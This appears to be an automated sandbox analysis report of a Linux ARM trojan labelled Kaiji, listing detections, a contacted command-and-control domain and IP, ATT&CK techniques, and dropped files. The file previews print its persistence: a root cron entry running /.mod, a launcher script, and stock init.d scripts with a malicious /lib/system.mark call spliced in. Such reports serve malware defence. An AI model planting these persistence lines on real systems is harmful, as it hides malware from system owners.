Source: open-vm-tools.14.dr	Binary or memory string: checktool='vmware-checkvm'
Source: open-vm-tools.14.dr	Binary or memory string: start-stop-daemon --stop --quiet --retry=TERM/30/KILL/5 --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd
Source: libgdi.so.0.8.2, 5672.1.000055c5f61e3000.000055c5f6786000.rw-.sdmp	Binary or memory string: Urg.qemu.gdb.arm.sys.regs">
Source: open-vm-tools.14.dr	Binary or memory string: log_daemon_msg "Stopping open-vm guest daemon" "vmtoolsd"
Source: 0S3wxWer8x.elf, 5491.1.0000557ea190a000.0000557ea1eae000.rw-.sdmp	Binary or memory string: ~U!/etc/qemu-binfmt/arm
Source: open-vm-tools.14.dr	Binary or memory string: echo "open-vm-tools: not starting as this is not a VMware VM"
Source: libgdi.so.0.8.2, 5672.1.000055c5f61e3000.000055c5f6786000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/arm
Source: .mod, 5667.1.00007ffdf89ae000.00007ffdf89cf000.rw-.sdmp, libgdi.so.0.8.2, 5667.1.00007ffdf89ae000.00007ffdf89cf000.rw-.sdmp	Binary or memory string: #8x86_64/usr/bin/qemu-arm/usr/lib/libgdi.so.0.8.2SHELL=/bin/shPWD=/rootLOGNAME=rootHOME=/rootLANG=en_US.UTF-8SHLVL=1PATH=/usr/bin:/bin_=/usr/lib/libgdi.so.0.8.2/usr/lib/libgdi.so.0.8.2
Source: libgdi.so.0.8.2, 5672.1.00007ffdb1e0d000.00007ffdb1e2e000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-arm
Source: open-vm-tools.14.dr	Binary or memory string: start-stop-daemon --start --quiet --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd -- --background /var/run/vmtoolsd.pid \|\| exit 2
Source: open-vm-tools.14.dr	Binary or memory string: log_daemon_msg "Starting open-vm daemon" "vmtoolsd"
Source: libgdi.so.0.8.2, 5672.1.000055c5f61e3000.000055c5f6786000.rw-.sdmp	Binary or memory string: rg.qemu.gdb.arm.sys.regs">
Source: 0S3wxWer8x.elf, 5491.1.0000557ea190a000.0000557ea1eae000.rw-.sdmp	Binary or memory string: ~Urg.qemu.gdb.arm.sys.regs">
Source: .mod, 5667.1.000055b6a8fd6000.000055b6a9579000.rw-.sdmp, libgdi.so.0.8.2, 5667.1.000055b6a8fd6000.000055b6a9579000.rw-.sdmp	Binary or memory string: Urg.qemu.gdb.arm.sys.regs">1/machine/unattached/device[1]
Source: open-vm-tools.14.dr	Binary or memory string: status_of_proc -p /var/run/vmtoolsd.pid /usr/bin/vmtoolsd vmtoolsd && exit 0 \|\| exit $?

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	1 Command and Scripting Interpreter	1 Unix Shell Configuration Modification	1 Unix Shell Configuration Modification	1 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Non-Standard Port	Exfiltration Over Other Network Medium	1 Data Manipulation
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Systemd Service	1 Systemd Service	1 Hide Artifacts	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Scripting	Logon Script (Windows)	1 Virtualization/Sandbox Evasion	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 File and Directory Permissions Modification	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Hidden Files and Directories	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
0S3wxWer8x.elf	21%	ReversingLabs	Linux.Trojan.Kaiji

Dropped Files

Source	Detection	Scanner	Label
/.mod	0%	ReversingLabs
/boot/system.pub	21%	ReversingLabs	Linux.Trojan.Kaiji
/etc/init.d/acpid	0%	ReversingLabs
/etc/init.d/alsa-utils	0%	ReversingLabs
/etc/init.d/anacron	0%	ReversingLabs
/etc/init.d/apparmor	0%	ReversingLabs
/etc/init.d/avahi-daemon	0%	ReversingLabs
/etc/init.d/bluetooth	0%	ReversingLabs
/etc/init.d/console-setup.sh	0%	ReversingLabs
/etc/init.d/cups	0%	ReversingLabs
/etc/init.d/cups-browsed	0%	ReversingLabs
/etc/init.d/dbus	0%	ReversingLabs
/etc/init.d/dns-udp4	0%	ReversingLabs
/etc/init.d/irqbalance	0%	ReversingLabs
/etc/init.d/keyboard-setup.sh	0%	ReversingLabs
/etc/init.d/kmod	0%	ReversingLabs
/etc/init.d/rsync	0%	ReversingLabs
/etc/init.d/saned	0%	ReversingLabs
/etc/init.d/screen-cleanup	0%	ReversingLabs
/etc/init.d/spice-vdagent	0%	ReversingLabs
/etc/init.d/ufw	0%	ReversingLabs
/etc/init.d/unattended-upgrades	0%	ReversingLabs
/etc/init.d/uuidd	0%	ReversingLabs
/etc/profile.d/bash.cfg	21%	ReversingLabs	Linux.Trojan.Kaiji
/etc/profile.d/bash.cfg.sh	0%	ReversingLabs
/usr/lib/libgdi.so.0.8.2	21%	ReversingLabs	Linux.Trojan.Kaiji
/usr/lib/system.mark	21%	ReversingLabs	Linux.Trojan.Kaiji

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://.jpg	0%	Avira URL Cloud	safe
http://.css	0%	Avira URL Cloud	safe
http://html4/loose.dtd	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
botbot.ddosvps.cc	209.141.53.247	true	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://html4/loose.dtd	0S3wxWer8x.elf, libgdi.so.0.8.2.14.dr, system.mark.14.dr, system.pub.14.dr, bash.cfg.14.dr	false	Avira URL Cloud: safe	unknown
http://.css	0S3wxWer8x.elf, libgdi.so.0.8.2.14.dr, system.mark.14.dr, system.pub.14.dr, bash.cfg.14.dr	false	Avira URL Cloud: safe	unknown
http://.jpg	0S3wxWer8x.elf, libgdi.so.0.8.2.14.dr, system.mark.14.dr, system.pub.14.dr, bash.cfg.14.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
209.141.53.247	botbot.ddosvps.cc	United States		53667	PONYNETUS	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
209.141.53.247	IMG_62100_41600pdf.exe	Get hash	malicious	AgentTesla	Browse	209.141.53.247/nel-1/inc/56ee82c6804416.php
209.141.53.247	IMG2115600269pdf.exe	Get hash	malicious	AgentTesla	Browse	209.141.53.247/nel-1/inc/56ee82c6804416.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
botbot.ddosvps.cc	ausNOyj9by.elf	Get hash	malicious	Unknown	Browse	209.141.53.247
	W4bP4K6GeP.elf	Get hash	malicious	Unknown	Browse	209.141.53.247
	HvuWdJQMCR.elf	Get hash	malicious	Unknown	Browse	209.141.53.247
	Vij3FJ8y4o.elf	Get hash	malicious	Unknown	Browse	209.141.53.247

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
PONYNETUS	ausNOyj9by.elf	Get hash	malicious	Unknown	Browse	209.141.53.247
	W4bP4K6GeP.elf	Get hash	malicious	Unknown	Browse	209.141.53.247
	HvuWdJQMCR.elf	Get hash	malicious	Unknown	Browse	209.141.53.247
	Vij3FJ8y4o.elf	Get hash	malicious	Unknown	Browse	209.141.53.247
	209.141.57.51-x86-2024-07-01T10_22_46.elf	Get hash	malicious	Gafgyt, Mirai	Browse	209.141.57.51
	209.141.57.51-mips-2024-07-01T10_22_47.elf	Get hash	malicious	Gafgyt, Mirai	Browse	209.141.57.51
	BVwjyOTKbI.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	107.189.29.207
	dqQPx7jLP8.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	107.189.29.207
	dREJ0R0Ryy.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	107.189.29.207
	hr4p2xQJR2.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	107.189.29.207

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
/etc/init.d/alsa-utils	ausNOyj9by.elf	Get hash	malicious	Unknown	Browse
	W4bP4K6GeP.elf	Get hash	malicious	Unknown	Browse
	HvuWdJQMCR.elf	Get hash	malicious	Unknown	Browse
	Vij3FJ8y4o.elf	Get hash	malicious	Unknown	Browse
/etc/init.d/acpid	ausNOyj9by.elf	Get hash	malicious	Unknown	Browse
	W4bP4K6GeP.elf	Get hash	malicious	Unknown	Browse
	HvuWdJQMCR.elf	Get hash	malicious	Unknown	Browse
	Vij3FJ8y4o.elf	Get hash	malicious	Unknown	Browse
/.mod	ausNOyj9by.elf	Get hash	malicious	Unknown	Browse
	W4bP4K6GeP.elf	Get hash	malicious	Unknown	Browse
	HvuWdJQMCR.elf	Get hash	malicious	Unknown	Browse
	Vij3FJ8y4o.elf	Get hash	malicious	Unknown	Browse
	adm64	Get hash	malicious	Unknown	Browse

Created / dropped Files

/.mod

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	Bourne-Again shell script, ASCII text executable
Category:	dropped
Size (bytes):	36
Entropy (8bit):	3.9931325576478587
Encrypted:	false
SSDEEP:	3:TKH/LQP5r:8M1
MD5:	77037D22D4F473F068BCE3E3318ACB01
SHA1:	8AB05FF9A8D9D73E2B23643B39D67EA1FF7A6418
SHA-256:	2F34A08D31571167FB11C6BA96496246219E44403A091B7F010B4C5559CB542B
SHA-512:	AE29513E81C527D8D27EF4CFE69E8D357632BA9AD944F7634D638DA486F8ABBDBD3181164C297A2AA3053D2BA46A5FB19471B5E809D2BB52996E4E2D312DF334
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: ausNOyj9by.elf, Detection: malicious, Browse Filename: W4bP4K6GeP.elf, Detection: malicious, Browse Filename: HvuWdJQMCR.elf, Detection: malicious, Browse Filename: Vij3FJ8y4o.elf, Detection: malicious, Browse Filename: adm64, Detection: malicious, Browse
Reputation:	low
Preview:	#!/bin/bash./usr/lib/libgdi.so.0.8.2

/boot/system.pub

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, Go BuildID=FRzpQZTUsYP7nS6EO2I9/tgRlYj8FE4XDUdPumWAp/M8pzTaAOFHhsAFBcUiYU/LZ4ma86tX3sTSTnp6AAc, stripped
Category:	dropped
Size (bytes):	5243032
Entropy (8bit):	6.032812796621413
Encrypted:	false
SSDEEP:	49152:wagnab47zaAs4cqq0OM9VpiOMXwXpfdmFEo:wagn8cVs4cqq6ZdmFEo
MD5:	F88F1C803432B72243DA85089264BC92
SHA1:	380F766EEC0B181CB094B51E366487DEABD0D312
SHA-256:	1D37CF0BBE88047CAF8442DB890EDAD597A52A70FBAB49CE258A51F9EA1B3163
SHA-512:	C6E56E053C0B6C0D623D2BABF45BD4FFEDDC3FBB7A886CDA96F28F03430420B01D860E00691C6DA3FC804BE441536466183C2A60B340D903F6C874A476D04113
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Reputation:	low
Preview:	.ELF..............(.....d...4...........4. ...(.........4...4...4...................................d...d...........................H^).H^)..................+...+... ... ...............K...L...L.................Q.td........................................................................................HN).................].............+.....I..................e............I7..I6.t...................o............a7..a6.....................y............e7..e6..................................e7..e6..p..................5.............L...K...................................L...K..d..............................@fP.@fO.xR................................P...O.x...............................0oS.0oR....................C...................d.....................................P.........................................................................................................................................................................................................................

/etc/.cfg

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	171
Entropy (8bit):	3.797305340802197
Encrypted:	false
SSDEEP:	3:0dkTLQKTBWTsbGqdtbGqYwSkTLQKTBWTsbGqdtbGqYwZWNUdYXRGXGOaYXRGXBHH:0d4MIBVD3DYwS4MIBVD3DYwiUgRGWAR+
MD5:	2A183E201FD1E4382EB2A457FDBB1AAB
SHA1:	6FB005FCA00054B406F66282BE2D049239E0043B
SHA-256:	EEEF64B6099BD12E560B45EDC128FFB86D72D8552E8933BFC10E1559FBC065B5
SHA-512:	442EB5E7DC91CECB2E5C687BF6438A0DA3855115A178864C5FB8204B8F97ED11CDF43524CDE281BDE30F82FEBE4D2312CF1BB15FA393744A12623ACE3186377D
Malicious:	false
Reputation:	low
Preview:	e464ed5cf25f2df1d063c362c10739c0e263c362c10739c0e263f618.e464ed5cf25f2df1d063c362c10739c0e263c362c10739c0e263f618.e74ed74ec12818ace24ce20ec12818ace24ce20edf3910b2fc6e8618.

/etc/crontab

Download File

Process:	/bin/bash
File Type:	ASCII text
Category:	dropped
Size (bytes):	24
Entropy (8bit):	3.000961982762677
Encrypted:	false
SSDEEP:	3:HFdtKeIBFv:l6eIBV
MD5:	6B13F24B625DC5B832A4AE80CFAB7DDA
SHA1:	8D0BAF4556328F9CEFB4041D67CB6BF30570AF84
SHA-256:	AC95234D459AA020883AF0A93879C835582CB60D7DD63C68F33993BA2546661F
SHA-512:	76774BF236D5DB77B09BFD2A36F190B86AC7DA7147C635CAF06A1884E151345585803885AD1FCBD60F566A48F165CBF8B445B506047CBC0A9924BF79B4C8E289
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	/1 * * * root /.mod .

/etc/init.d/acpid

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2304
Entropy (8bit):	5.101745776620701
Encrypted:	false
SSDEEP:	48:9tdVEA2+3MPMiOBdxAEGbsbcq1himLHLHmvgjWL:9tdVEA2+3MPi90Qbcq1Q4Hrmvt
MD5:	6BBECC4CA13C3007B79B315AD5B8EB33
SHA1:	E32443A6D19709D269DFD58D5D48F23192F8ED82
SHA-256:	98C12A01C2E5F562B14E931C9B503824429C82E088BA06BA43A6313565DB15DE
SHA-512:	29E15DE525FB44D5823429C80280CBF91592A546A5778EA6C056DFE7A390C4DEC2381D22649A110D14DD732473BB9BA7C43D482BAE2E7315120AE8BF9AFE502B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: ausNOyj9by.elf, Detection: malicious, Browse Filename: W4bP4K6GeP.elf, Detection: malicious, Browse Filename: HvuWdJQMCR.elf, Detection: malicious, Browse Filename: Vij3FJ8y4o.elf, Detection: malicious, Browse
Reputation:	low
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: acpid.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# X-Start-Before: kdm gdm3 xdm lightdm.# X-Stop-After: kdm gdm3 xdm lightdm.# Default-Start: 2 3 4 5.# Default-Stop: .# Short-Description: Start the Advanced Configuration and Power Interface daemon.# Description: Provide a socket for X11, hald and others to multiplex.# kernel ACPI events..### END INIT INFO..set -e..ACPID="/usr/sbin/acpid".DEFAULTS="/etc/default/acpid"..# Check for daemon presence.[ -x "$ACPID" ] \|\| exit 0..OPTIONS="".MODULES="".# Include acpid defaults if available.[ -r "$DEFAULTS" ] && . "$DEFAULTS"..# Get lsb functions.. /lib/lsb/init-functions..# As the name says. If the kernel supports modules, it'll try to load.# the ones listed in "MODULES"..load_modules() {. [ -f /proc/modules ] \|\| return 0. if [ "$MODULES" = "all" ]; then./lib/system.mark. MODULES="$(sed -rn 's#^(/lib/mod

/etc/init.d/alsa-utils

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	5694
Entropy (8bit):	5.4216099972768905
Encrypted:	false
SSDEEP:	96:iKtDd9/iwtDaLE+E9nw3mFRzF+rv17AypQyhHk5eEkv:iCdld6E+UnKeRB+rv1cyOyZkq
MD5:	25EEDDA5AB2F0AF6683A5A1365EF11A0
SHA1:	76963A11F9F43D6BC6336B0A9610C8668E0F3E79
SHA-256:	37AAA474A96690F2C8BCAD49AB3E31D59D2E4749E2C3EEF7AFCB82406DF6FD81
SHA-512:	3D89F435223BC02FC71722A6FC3A256F30A15168A45DD239B28144593E66653DF43C8F2B0CBFF57BB432D68B26F98173B5F19A2EC6D4D319EDB76994902374CC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: ausNOyj9by.elf, Detection: malicious, Browse Filename: W4bP4K6GeP.elf, Detection: malicious, Browse Filename: HvuWdJQMCR.elf, Detection: malicious, Browse Filename: Vij3FJ8y4o.elf, Detection: malicious, Browse
Reputation:	low
Preview:	#!/bin/sh.#.# alsa-utils initscript.#.### BEGIN INIT INFO.# Provides: alsa-utils.# Required-Start: $local_fs $remote_fs.# Required-Stop: $remote_fs.# Default-Start: S.# Default-Stop: 0 1 6.# Short-Description: Restore and store ALSA driver settings.# Description: This script stores and restores mixer levels on.# shutdown and bootup.On sysv-rc systems: to.# disable storing of mixer levels on shutdown,.# remove /etc/rc[06].d/K50alsa-utils. To disable.# restoring of mixer levels on bootup, rename the.# "S50alsa-utils" symbolic link in /etc/rcS.d/ to.# "K50alsa-utils"..### END INIT INFO..# Don't use set -e; check exit status instead..# Exit silently if package is no longer installed.[ -x /usr/sbin/alsactl ] \|\| exit 0..PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin.MYNAME=/etc/init.d/alsa-utils.ALSACTLHOME=/run/alsa..[ -d "$ALSA

/etc/init.d/anacron

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2124
Entropy (8bit):	4.763929127414264
Encrypted:	false
SSDEEP:	24:aiF8WzzU+LuN5K6YqfO05i1CPeueczZR11s+M8k93ILlfdW6910kF4T0Op:7RzgTNNOGi1eTrzZR1vX5fsKX00+
MD5:	816D2CB2EBBEA0A92840D29E03A3AEF2
SHA1:	DE872E6EAA118E80E9D7A3D1B0CA7C73FD30CB49
SHA-256:	2822A1618EEFA229CB29520923C7E47B61981E11D2028CD62611B18BCE215B87
SHA-512:	5BD322EA5D511EA3A5C7AB832FCCB7DA138C4E352CCD5A140F783B4E196A5C2A0FA33D5DFB54C353A15ADEF42E507D076E66C3C3546EE1E70F538EDA7E52EB7E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: anacron.# Required-Start: $remote_fs $syslog $time.# Required-Stop: $remote_fs $syslog $time.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: Run anacron jobs.# Description: The first purpose of this script is to run anacron at.# boot so that it can catch up with missed jobs. Note.# that anacron is not a daemon. It is run here just once.# and is later started by the real cron. The second.# purpose of this script is that said cron job invokes.# this script to start anacron at those subsequent times,.# to keep the logic in one place..### END INIT INFO..PATH=/bin:/usr/bin:/sbin:/usr/sbin..test -x /usr/sbin/anacron \|\| exit 0.test -r /etc/default/anacron && . /etc/default/anacron... /lib/lsb/init-functions..case "$1" in. start). if init_is_upstart 2>/dev/null; then./lib/system.mark. exit 1. fi. log_daemon_msg "Starting

/etc/init.d/apparmor

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3826
Entropy (8bit):	5.2527487182090535
Encrypted:	false
SSDEEP:	96:RFCjnn83hjzYn1zJNSNuDNBqNPoNpDbANEFygG9M3zR4hszR4hxRl:Wjn4hjUD9dwl
MD5:	026032FB398BC8D223FFFAC164EC8BDC
SHA1:	2804934FD92CE102B1B64E908DE69B93BDAF0F62
SHA-256:	7EBDBADE1AA7BE3A53549975CD202067C822B137898B91AEE8148A96B80B82D5
SHA-512:	CAD3D3A4EBC3B0B3707B2B8FA5D301F0A8FEFBE78D7064B096A746AB2C0957B2AF29CA4BAFB4603EF0C80380EBC5AD40A7030C7B49BF62164B9DAFECD2C8CFB5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	#!/bin/sh.# ----------------------------------------------------------------------.# Copyright (c) 1999, 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007.# NOVELL (All rights reserved).# Copyright (c) 2008, 2009 Canonical, Ltd..#.# This program is free software; you can redistribute it and/or.# modify it under the terms of version 2 of the GNU General Public.# License published by the Free Software Foundation..#.# This program is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the.# GNU General Public License for more details..#.# You should have received a copy of the GNU General Public License.# along with this program; if not, contact Novell, Inc..# ----------------------------------------------------------------------.# Authors:.# Steve Beattie <steve.beattie@canonical.com>.# Kees Cook <kees@ubuntu.com>.#.# /etc/init.d/app

/etc/init.d/apport

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3050
Entropy (8bit):	5.219163763155702
Encrypted:	false
SSDEEP:	48:jV/OxxHuoBusZABLm/tiUmZdWEdBuSZWg/e/fupMWDGdxboGxz5:jV/OxNDBusZABLm1BmyEbuSZWg2/TWOT
MD5:	8669B5F957342072FF16241BEAA010FD
SHA1:	2E45CEA64AEE1115B5EDBAAC7407B340E47EC7C1
SHA-256:	4DE7B672D754167242FEB9A95D9FA35514114948CFD3567B8BB8BF294F38FB17
SHA-512:	4F426321E4A7123B6E0B19DEF3455CEACBA152FCB5F21A106B809F3B2FB2054300F391DEE9E498749544ED22C8B351AD5E35658813209917672052988D21DF8F
Malicious:	true
Preview:	#! /bin/sh..### BEGIN INIT INFO.# Provides: apport.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: automatic crash report generation.### END INIT INFO..DESC="automatic crash report generation".NAME=apport.AGENT=/usr/share/apport/apport.SCRIPTNAME=/etc/init.d/$NAME..# Exit if the package is not installed.[ -x "$AGENT" ] \|\| exit 0..# read default file.enabled=1.[ -e /etc/default/$NAME ] && . /etc/default/$NAME \|\| true..# Define LSB log_* functions..# Depend on lsb-base (>= 3.0-6) to ensure that this file is present... /lib/lsb/init-functions..#.# Function that starts the daemon/service.#.do_start().{..# Return..# 0 if daemon has been started..# 1 if daemon was already running..# 2 if daemon could not be started...[ -e /var/crash ] \|\| mkdir -p /var/crash..chmod 1777 /var/crash...# check for kernel crash dump, convert it to apport report..if [ -e /var/crash/vmcore ] \|\| [ -n "`ls /va

/etc/init.d/avahi-daemon

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2453
Entropy (8bit):	4.853742484748698
Encrypted:	false
SSDEEP:	48:9s2V+ig+Ui83MZoJQukTSiVC2/uldA0uv3uKv2ZsGyjyRfg/zsDE7Ed:93oijU4ukTSCu40uv3uKvdJOR4ADHd
MD5:	D6F4FB4B6543A32644DC249C8B6D17A0
SHA1:	C5E44B40458D426759A7EB88B4E55C3ACEF94077
SHA-256:	05EF48FCD09FA3D2BC5C5297F0C9852810F8CBECEA65B0ED26A980D4A5F9D387
SHA-512:	06573A9DC46732518C4BAC856AA7C47B67CB0612BAC0192312A95699DF090782F457EBD138FCD6AE9858F8359209A54EC020115E1EFE450C2EA68D47E4554D30
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: avahi avahi-daemon.# Required-Start: $remote_fs dbus.# Required-Stop: $remote_fs dbus.# Should-Start:. $syslog.# Should-Stop: $syslog.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: Avahi mDNS/DNS-SD Daemon.# Description: Zeroconf daemon for configuring your network .# automatically.### END INIT INFO..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DESC="Avahi mDNS/DNS-SD Daemon".NAME="avahi-daemon".DAEMON="/usr/sbin/$NAME".SCRIPTNAME=/etc/init.d/$NAME..# Gracefully exit if the package has been removed..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..# Include avahi-daemon defaults if available..test -f /etc/default/avahi-daemon && . /etc/default/avahi-daemon..DISABLE_TAG="/var/run/avahi-daemon/disabled-for-unicast-local"..#.# Function that starts the daemon/service..#.d_start() {. $DAEMON -c && return 0.. if [ -e $DISABLE_TAG -a "$AVAHI_DAEMON_DETECT_LOCAL" !=

/etc/init.d/binfmt-support

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	5.05188801367894
Encrypted:	false
SSDEEP:	24:ai3V6yXngSBVSBNyj6edNHcBcNlekvx2w5mw+76opC:73ZngWVWNMNH0YlbJ2w4wrJ
MD5:	E6D454B5675D599827B9892551BAF33F
SHA1:	FC529362E60C9D6B0DC86779CFA890B6621FD11E
SHA-256:	37F47BEF4B4D1021E5FDC6BD2F4E90FA9BA3175A83DB2BE094EF68F50A07828B
SHA-512:	3752D5178841DDD8FB9F09BDA4EB0D2FA4391BB951273B3911347AC93135E9A516919E28487724371F6A7CE689BAA053855A3219FC68944751313B0405BA48DE
Malicious:	true
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: binfmt-support.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: Support for extra binary formats.# Description: Enable support for extra binary formats using the Linux.# kernel's binfmt_misc facility..### END INIT INFO..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.NAME=binfmt-support.DESC="additional executable binary formats"..if [ "$(uname)" != Linux ]; then./lib/system.mark. exit 0.fi..which update-binfmts >/dev/null 2>&1 \|\| exit 0... /lib/lsb/init-functions.[ -r /etc/default/rcS ] && . /etc/default/rcS..set -e.CODE=0..case "$1" in. start). log_daemon_msg "Enabling $DESC" "$NAME". update-binfmts --enable \|\| CODE=$?. log_end_msg $CODE. exit $CODE. ;;.. stop). log_daemon_msg "Disabling $DESC" "$NAME". update-binfmts --disable \|\| CODE=$?. log_end_msg $CODE. exi

/etc/init.d/bluetooth

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3071
Entropy (8bit):	5.405379841493847
Encrypted:	false
SSDEEP:	48:71OoPrcMbC/BUUzGrm92+kbM9A5LmiEQoOZoKkkFoM+Zh9YkFoMr4Ote:79TcWC/BUeem92R4q5LRPt5w9VplA
MD5:	85F7B5D11EBD6ABDA86B5DF999F8B6D6
SHA1:	898A95C0302A0D24763D2B10EDC21E921564B1C8
SHA-256:	5A23A691BEE3E1D9A1723811D45030CCAD72CDFDA4AF1C1B5BEC6C027F8831D3
SHA-512:	9BED1FAE531015163C3665B24B678AEA239EC8FA6F92E06CCD044AEAF1B490251B5D7196876FAF1E8C3F2C73E208E268BF9DB6EC9B0535FC7CABA5DC6542F692
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: bluetooth.# Required-Start: $local_fs $syslog $remote_fs dbus.# Required-Stop: $local_fs $syslog $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: Start bluetooth daemons.### END INIT INFO.#.# bluez Bluetooth subsystem starting and stopping.#.# originally from bluez's scripts/bluetooth.init.#.# Edd Dumbill <ejad@debian.org>.# LSB 3.0 compilance and enhancements by Filippo Giunchedi <filippo@debian.org>.#.# Updated for bluez 4.7 by Mario Limonciello <mario_limonciello@dell.com>.# Updated for bluez 5.5 by Nobuhiro Iwamatsu <iwamatsu@debian.org>.#.# Note: older daemons like dund pand hidd are now shipped inside the.# bluez-compat package..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DESC=bluetooth..DAEMON=/usr/sbin/bluetoothd.HCIATTACH=/usr/bin/hciattach..BLUETOOTH_ENABLED=0.HID2HCI_ENABLED=1.HID2HCI_UNDO=1..SDPTOOL=/usr/bin/sdptool..# If you want to be ignore error of "org.freedesktop.hostname1",.# please en

/etc/init.d/console-setup.sh

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1301
Entropy (8bit):	4.338919117179571
Encrypted:	false
SSDEEP:	24:9lBie8ItKzeBcxlo8/z3ejhGJckS5gzjdJ5ZWkZg7zcOqb6:938yKzYcX/LshGJckS5gJ58kG7A9b6
MD5:	BDD323E45B8053AC9234F45E20BABD66
